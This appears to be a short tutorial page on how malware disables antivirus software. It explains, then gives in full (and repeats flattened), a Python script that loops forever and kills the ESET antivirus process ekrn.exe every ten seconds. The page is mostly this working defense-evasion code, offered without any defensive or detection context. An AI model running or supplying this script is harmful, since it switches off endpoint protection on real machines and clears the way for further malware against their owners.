🍫How Malware Author Terminate Antivirus Process during runtime ?

How Malware Author Terminate Antivirus Process during runtime ?

Explanation

Import Libraries:
- psutil for process management.
- time for adding delays.
Define terminate_process_by_name Function:
- Iterates over all running processes and checks if the process name matches ekrn.exe.
- Terminates the process if a match is found.
- Handles exceptions if the process no longer exists or access is denied.
- Returns True if the process was found and terminated; otherwise, False.
Main Block:
- Sets the process name to ekrn.exe.
- Continuously checks for the process every 10 seconds.
- Prints status messages indicating whether the process was found and terminated.
Loop and Delay:
- The while True loop ensures the script keeps running and checking for the process.
- time.sleep(10) introduces a delay of 10 seconds between checks to avoid excessive CPU usage.

// import psutil
import time

def terminate_process_by_name(process_name):
    """Terminate processes by their name."""
    for process in psutil.process_iter(['name']):
        if process.info['name'].lower() == process_name.lower():
            try:
                process.terminate()
                print(f"Terminated process: {process.info['name']} (PID: {process.pid})")
                return True
            except psutil.NoSuchProcess:
                print(f"Process {process.info['name']} (PID: {process.pid}) no longer exists")
            except psutil.AccessDenied:
                print(f"Access denied to terminate process: {process.info['name']} (PID: {process.pid})")
    return False

if __name__ == "__main__":
    process_name = 'ekrn.exe'
    
    while True:
        found = terminate_process_by_name(process_name)
        if found:
            print(f"Process {process_name} was found and terminated.")
        else:
            print(f"Process {process_name} not found.")
        
        # Wait for 10 seconds before checking again
        time.sleep(10)

PreviousMalware Author Mindset

Last updated 7 months ago

// import psutil import time def terminate_process_by_name(process_name): """Terminate processes by their name.""" for process in psutil.process_iter(['name']): if process.info['name'].lower() == process_name.lower(): try: process.terminate() print(f"Terminated process: {process.info['name']} (PID: {process.pid})") return True except psutil.NoSuchProcess: print(f"Process {process.info['name']} (PID: {process.pid}) no longer exists") except psutil.AccessDenied: print(f"Access denied to terminate process: {process.info['name']} (PID: {process.pid})") return False if __name__ == "__main__": process_name = 'ekrn.exe' while True: found = terminate_process_by_name(process_name) if found: print(f"Process {process_name} was found and terminated.") else: print(f"Process {process_name} not found.") # Wait for 10 seconds before checking again time.sleep(10)